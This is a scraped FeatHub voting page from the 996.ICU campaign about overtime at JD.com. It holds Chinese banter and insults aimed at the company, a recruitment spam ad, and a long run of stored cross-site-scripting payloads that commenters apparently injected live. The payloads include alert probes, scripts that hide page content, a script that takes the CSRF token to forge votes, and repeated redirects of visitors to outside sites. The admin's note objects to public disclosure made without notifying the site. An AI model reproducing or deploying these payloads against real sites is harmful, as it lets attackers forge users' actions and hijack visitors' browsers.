LinXueyuanStdio/996.ICU

京东(假装置顶:投票正常能用。查看评论请禁用JavaScript)

LinXueyuanStdio asked for this feature 5 months ago — 87 comments

LinXueyuanStdio commented 5 months ago Admin

cshsoft commented 5 months ago

垃圾二手东 .坑逼

chrisgang commented 5 months ago

| 641500461 commented 5 months ago

傻逼京东

| nicle-lin commented 5 months ago

真的吗?

liyabin1105 commented 5 months ago

这么多票,你们还是东哥的兄弟吗

lobtao commented 5 months ago

东哥的战友

| solebeibei commented 5 months ago

兄弟

| ZenYuan commented 5 months ago

d东哥不要兄弟了

dblclick commented 5 months ago

真视我 崽种

| Coleman-p commented 5 months ago

说实话小公司真不敢往上写,加班更不要命

| gxkyrftx commented 5 months ago

你们不是东哥的兄弟了,hhh

| linyusen1995 commented 5 months ago

让东哥情何以堪?

shanrain commented 5 months ago

东哥把你当兄弟哈哈哈

| ziiber commented 5 months ago

哈哈哈哈 还是不是东哥的兄弟了?

JHsunshine commented 5 months ago

兄弟们不要光投票,把具体情况也讲一讲啊

| Simon-Leung commented 5 months ago

活该仙人跳,狗东

17701253801 commented 5 months ago

我估计有些公司要被吓尿了

| saschapojot commented 5 months ago

咚咚锵就要惨死下水道无人问津噜

nimil commented 5 months ago

东哥把你们当兄弟,你们却在这里投票

zncook commented 5 months ago

女乃妹妹后来怎么样了?

RicoLiu commented 5 months ago

东哥把你们当兄弟

| BosenY commented 5 months ago

你们竟然在背后搞东哥

zhou-hai commented 5 months ago

奶茶哭晕在厕所。。。

w460931543 commented 5 months ago

What happened

sorrymeto commented 5 months ago

中国gdp,996工作制真心贡献不少。

| mpkmapengkai commented 5 months ago

在座的各位连东哥都不认了么?

| renzhe12138 commented 5 months ago

垃圾二手东

multiplatformsgamer commented 5 months ago

这网站直接用的github的账号。基本上nickname都一样。怎么匿名。网站太卡

| prettychaoyao commented 5 months ago

不然,东哥怎么给得起过夜费

sagiwei commented 5 months ago

工资范围越详细越好???这里投机的人可真多

leyuxinsi commented 5 months ago

大家还是不是东哥兄弟了。

y18zhou commented 5 months ago

JD没有996吧,看来是文化太拉仇恨了。

zhaoqingzhi commented 5 months ago

gg

kanboom commented 5 months ago

666

| yesjustnoname commented 5 months ago

你把东子当兄弟,东子把你当条狗

carolove commented 5 months ago

哈哈京东被黑的最惨的一天

| ostopuro commented 5 months ago

| lc338310659 commented 5 months ago

除了电子产品还行和七天无理由退换货政策以外,我对京东没啥好印象。

qq1057119720 commented 5 months ago

强东:我拿你当兄弟,你在这计较这点时间

gh0stkey commented 5 months ago

NinnHou commented 5 months ago

程序员的血汗工厂么。

| redappless commented 5 months ago

狗比东,秋招面试坑了多少人(被去年秋招坑了点赞)。给个侮辱价,加班不给钱,还不如华为,cnm

zhuanggy commented 5 months ago

京东商城前台体系,995,加班排名制,没有加班补贴。

skychx commented 5 months ago

/>alert('1')

d9823 commented 5 months ago

alert("我一个Android开发者都学会了xss注入~~~~~ 这成本也太低了吧")

intrhuting commented 5 months ago

东哥:我给兄弟们带来了一点小礼物,996,大家好好干,我不会亏待大家。好了,我先回家陪奶茶妹妹了。

zx1013196355 commented 5 months ago

嘿嘿

zx1013196355 commented 5 months ago

我要特殊点

| a346076818886 commented 5 months ago

alert('111111')

qingfengjiang commented 5 months ago

alert('hello');

intrhuting commented 5 months ago

美国上市互联网企业,总部上海,硅谷、北京、深圳、广州、台北都有办公点,全球业务,飞速发展中,开发、运营、产品、销售、商务、设计职位都在招人,薪资丰厚,10点上班,6点多下班,一周5天,拒绝996,不进icu。想内推加v:sharehealthy

jokyme commented 5 months ago

">

666sbX commented 5 months ago

jokyme while有意思?记住一点,你大爷还是你大爷

MagicGary commented 5 months ago

MagicGary commented 5 months ago

window.alert = function() { return false; }

| LinXueyuanStdio commented 5 months ago Admin

table{visibility: collapse;}

| LinXueyuanStdio commented 5 months ago Admin

var commentBodySet = document.getElementsByClassName("body");for(var i=0;i

leo66123 commented 5 months ago

VeHan commented 5 months ago

你们都是魔鬼吗

VeHan commented 5 months ago

快来喷这个人,他弄个死循环

https://github.com/leo66123/leo66123.github.io/issues/1

| LinXueyuanStdio commented 5 months ago Admin

img,svg,table{visibility: collapse;}

| xilibili commented 5 months ago

618赶上端午节,0点到24点加班居然不让提。。。

reinit commented 5 months ago

Please report XSS vulnerability

var xmlReq = new XMLHttpRequest(); xmlReq.addEventListener("load", function() { alert("Please report XSS vulnerability at https://feathub.com/feathub/feathub/+65, or https://feathub.com/feathub/feathub/+66 if you love me."); }); xmlReq.open("POST", "https://feathub.com/feathub/feathub/+65/vote?vote[score]=1"); xmlReq.send();

reinit commented 5 months ago

Please report XSS vulnerability

var xmlReq = new XMLHttpRequest(); xmlReq.addEventListener("load", function() { alert("Please report XSS vulnerability at https://feathub.com/feathub/feathub/+65, or https://feathub.com/feathub/feathub/+66 if you love me."); }); xmlReq.open("POST", "https://feathub.com/feathub/feathub/+65/vote?vote[score]=1", true); xmlReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlReq.setRequestHeader("Cache-Control", "no-cache"); xmlReq.setRequestHeader("Referer", "https://feathub.com/feathub/feathub/+65"); xmlReq.send("method=patch&authenticitytoken=" + document.head.querySelector("[name~=csrf-token][content]").content);

ThomasHuang025 commented 5 months ago

const observer = new MutationObserver(mutations => { mutations.forEach(({ addedNodes }) => { addedNodes.forEach(node => { if(node.tagName === 'SCRIPT') { node.type = 'javascript/blocked' node.parentElement.removeChild(node) const beforeScriptExecuteListener = function (event) { event.preventDefault() node.removeEventListener('beforescriptexecute', beforeScriptExecuteListener) } node.addEventListener('beforescriptexecute', beforeScriptExecuteListener) } }) }) }) observer.observe(document.documentElement, { childList: true, subtree: true })

| LinXueyuanStdio commented 5 months ago Admin

我是管理员,借楼说明一下。

恶意把XSS攻击方法发布到公众号和知乎等平台的米斯特安全团队,根本没联系过我,我这个和FeatHub关联的账号明明有邮箱的,但是没有收到任何一封邮件是关于漏洞的。也就是说,它在发现漏洞后,第一时间把漏洞公开,根本不给FeatHub反应时间,违背了一个信息安全人员应有的职业道德。

然后是怎么修复的问题。这个我管不了,因为FeatHub根本没有删除功能。也就是说,不能删评论,不能删 project,除了改改标题,打开关闭,没了。嗯,README也没得加,置顶也没有(虽然可以用京东假装置顶)

XSS的漏洞只能联系官方解决。。但是我看了一下,很奇怪,官方自己没给联系方式。。。只有一个repo和twitter,但是很久没更新了。。

(话说官方诈死,这么大流量还没崩,这是什么神仙服务器哈哈哈)

superzmy commented 5 months ago

我觉得要不弄个自动删除script的脚本?

superzmy commented 5 months ago

for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; }

<script> for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; } <script>

| zzxcvbnm19 commented 5 months ago

asdasd

| zzxcvbnm19 commented 5 months ago

sadasd

| zzxcvbnm19 commented 5 months ago

dasd

| zzxcvbnm19 commented 5 months ago

sdasd

| zzxcvbnm19 commented 5 months ago

| zzxcvbnm19 commented 5 months ago

superzmy 老哥,你传的最后一个脚本把下面都隐藏了

| zzxcvbnm19 commented 5 months ago

缺东西,给你圆回来了☺

guotao commented 4 months ago

If it were too difficult to allow as the folder under root, location.href="https://blogs.kainy.cn/?from=feathubXSS2" how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。

guotao commented 4 months ago

If it were too difficult to allow as the folder under root, location.href="https://blogs.kainy.cn/?from=feathubXSS2" how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。

guotao commented 4 months ago

If it were too difficult to allow as the folder under root, location.href="https://blogs.kainy.cn/?from=feathubXSS2" ; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。

guotao commented 4 months ago

If it were too difficult to allow as the folder under root, location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。

guotao commented 4 months ago

If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。

guotao commented 4 months ago

If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。

guotao commented 4 months ago

If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。,。。

wtf996 commented 4 months ago

window.location.href='https://www.qwq.wtf/?from=XSS';

guotao commented 4 months ago

If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。  。

guotao commented 4 months ago

If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。 ]>([\s\S])<\/body>/)[1].replace(/<?script?>/g,'').replace(/<\/?script?>/g,'').replace(//g, '')}};xmlhttp.open('GET',window.location.href,true);xmlhttp.send() }, 0)"/>  。

Join the discussion!

Sign-in with GitHub to comment